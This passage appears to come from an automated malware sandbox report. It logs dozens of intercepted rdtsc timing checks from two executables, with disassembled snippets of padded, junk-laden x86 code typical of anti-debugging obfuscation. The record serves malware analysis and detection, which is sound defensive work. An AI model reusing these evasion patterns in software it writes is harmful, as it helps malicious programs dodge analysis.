0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50B55 second address: 4F50B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0EC6B64CEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50B7C second address: 4F50C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF0EC517C84h 0x00000011 adc ax, 0FC8h 0x00000016 jmp 00007FF0EC517C7Bh 0x0000001b popfd 0x0000001c call 00007FF0EC517C88h 0x00000021 pushfd 0x00000022 jmp 00007FF0EC517C82h 0x00000027 adc ecx, 16035558h 0x0000002d jmp 00007FF0EC517C7Bh 0x00000032 popfd 0x00000033 pop ecx 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FF0EC517C85h 0x0000003e and ecx, 767C08F6h 0x00000044 jmp 00007FF0EC517C81h 0x00000049 popfd 0x0000004a pushfd 0x0000004b jmp 00007FF0EC517C80h 0x00000050 sbb ecx, 1D3A1A18h 0x00000056 jmp 00007FF0EC517C7Bh 0x0000005b popfd 0x0000005c popad 0x0000005d pop ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 call 00007FF0EC517C7Bh 0x00000066 pop esi 0x00000067 pushfd 0x00000068 jmp 00007FF0EC517C89h 0x0000006d and esi, 33A35E66h 0x00000073 jmp 00007FF0EC517C81h 0x00000078 popfd 0x00000079 popad 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50C8A second address: 4F50C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50C9A second address: 4F50C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: 9BED6A second address: 9BED7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CCh 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B37FCC second address: B37FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B370A5 second address: B370AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B37607 second address: B3760D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3760D second address: B37613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B37613 second address: B37620 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B37620 second address: B37630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B378DC second address: B378E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B378E7 second address: B378F3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0EC6B64CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B378F3 second address: B37924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF0EC517C88h 0x0000000f jmp 00007FF0EC517C7Fh 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B37924 second address: B3792A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3792A second address: B3793C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FF0EC517C7Ch 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B377 second address: B3B40C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF0EC6B64C8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FF0EC6B64CDh 0x00000018 pop eax 0x00000019 push esi 0x0000001a jmp 00007FF0EC6B64D6h 0x0000001f pop edi 0x00000020 push 00000003h 0x00000022 jnl 00007FF0EC6B64CCh 0x00000028 push 00000000h 0x0000002a mov edx, dword ptr [ebp+122D1CAFh] 0x00000030 push 00000003h 0x00000032 jmp 00007FF0EC6B64D6h 0x00000037 mov dword ptr [ebp+122D3228h], edx 0x0000003d call 00007FF0EC6B64C9h 0x00000042 jmp 00007FF0EC6B64D9h 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B40C second address: B3B489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC517C88h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FF0EC517C82h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jnp 00007FF0EC517C7Eh 0x0000001d push esi 0x0000001e jnc 00007FF0EC517C76h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 je 00007FF0EC517C88h 0x0000002f pushad 0x00000030 jmp 00007FF0EC517C7Ah 0x00000035 jns 00007FF0EC517C76h 0x0000003b popad 0x0000003c pop eax 0x0000003d mov dword ptr [ebp+122D1C3Ah], ecx 0x00000043 lea ebx, dword ptr [ebp+12450150h] 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c ja 00007FF0EC517C7Ch 0x00000052 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B653 second address: B3B662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CBh 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B662 second address: B3B688 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF0EC517C85h 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B688 second address: B3B69C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B69C second address: B3B6E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C84h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FF0EC517C78h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a call 00007FF0EC517C79h 0x0000002f pushad 0x00000030 push ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B6E5 second address: B3B728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jnc 00007FF0EC6B64C6h 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007FF0EC6B64D7h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007FF0EC6B64CDh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 ja 00007FF0EC6B64C6h 0x00000029 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B728 second address: B3B72E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B72E second address: B3B7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FF0EC6B64D8h 0x00000012 pop eax 0x00000013 pushad 0x00000014 mov dword ptr [ebp+122D2CB3h], ecx 0x0000001a mov edi, 51D9B0A6h 0x0000001f popad 0x00000020 push 00000003h 0x00000022 pushad 0x00000023 add si, 1665h 0x00000028 movzx eax, di 0x0000002b popad 0x0000002c push 00000000h 0x0000002e call 00007FF0EC6B64D1h 0x00000033 mov ecx, eax 0x00000035 pop esi 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FF0EC6B64C8h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 call 00007FF0EC6B64C9h 0x00000057 jmp 00007FF0EC6B64D3h 0x0000005c push eax 0x0000005d je 00007FF0EC6B64CEh 0x00000063 jnc 00007FF0EC6B64C8h 0x00000069 mov eax, dword ptr [esp+04h] 0x0000006d pushad 0x0000006e jmp 00007FF0EC6B64CBh 0x00000073 jbe 00007FF0EC6B64CCh 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B3B7F6 second address: B3B868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push edi 0x00000008 jno 00007FF0EC517C78h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FF0EC517C88h 0x00000018 pop eax 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FF0EC517C78h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 jmp 00007FF0EC517C7Ch 0x00000038 lea ebx, dword ptr [ebp+12450164h] 0x0000003e pushad 0x0000003f push edi 0x00000040 xor di, 9231h 0x00000045 pop edx 0x00000046 stc 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edi 0x0000004c je 00007FF0EC517C76h 0x00000052 pop edi 0x00000053 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B313A6 second address: B313AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B313AC second address: B313B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B58F67 second address: B58F86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5938D second address: B59391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59391 second address: B59395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B594F0 second address: B59501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Dh 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59501 second address: B5951E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59805 second address: B59816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF0EC517C76h 0x00000009 jl 00007FF0EC517C76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59816 second address: B5983D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jnc 00007FF0EC6B64C6h 0x00000010 jmp 00007FF0EC6B64D6h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B599BB second address: B599BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B599BF second address: B599D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B599D8 second address: B599DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B599DC second address: B599FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0EC6B64C6h 0x00000008 jmp 00007FF0EC6B64D4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B599FA second address: B59A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF0EC517C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59A06 second address: B59A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59A0A second address: B59A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59D00 second address: B59D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59D04 second address: B59D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FF0EC517C7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59D14 second address: B59D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FF0EC6B64C6h 0x0000000f rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59D23 second address: B59D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF0EC517C7Ch 0x0000000e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59D45 second address: B59D7A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC6B64D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF0EC6B64CFh 0x0000000f jmp 00007FF0EC6B64D2h 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59EF5 second address: B59F4D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0EC517C76h 0x00000008 jmp 00007FF0EC517C7Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF0EC517C81h 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 jmp 00007FF0EC517C89h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jnc 00007FF0EC517C76h 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B59F4D second address: B59F53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B2A655 second address: B2A65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B2A65B second address: B2A661 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B2A661 second address: B2A676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C80h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5AAD4 second address: B5AADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5E4B0 second address: B5E4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5E4B4 second address: B5E4CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push ebx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5E4CA second address: B5E4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c jnc 00007FF0EC517C76h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5E4E0 second address: B5E50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jbe 00007FF0EC6B64CEh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0EC6B64CFh 0x00000019 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5E50B second address: B5E521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C81h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5E784 second address: B5E78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF0EC6B64C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5F9F1 second address: B5F9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5F9F7 second address: B5F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B5F9FB second address: B5FA0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF0EC517C7Bh 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B661E1 second address: B661E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B661E5 second address: B661ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B661ED second address: B66207 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0EC6B64CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FF0EC6B64C6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B66207 second address: B6620F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6569F second address: B656A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B65813 second address: B65838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF0EC517C84h 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B65838 second address: B6583E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6583E second address: B65847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B65847 second address: B6584C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6584C second address: B65882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C88h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FF0EC517C83h 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B65882 second address: B6589E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B659DF second address: B659E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B65F49 second address: B65F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B65F4F second address: B65F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6609C second address: B660A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0EC6B64C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B660A6 second address: B660BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC517C7Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
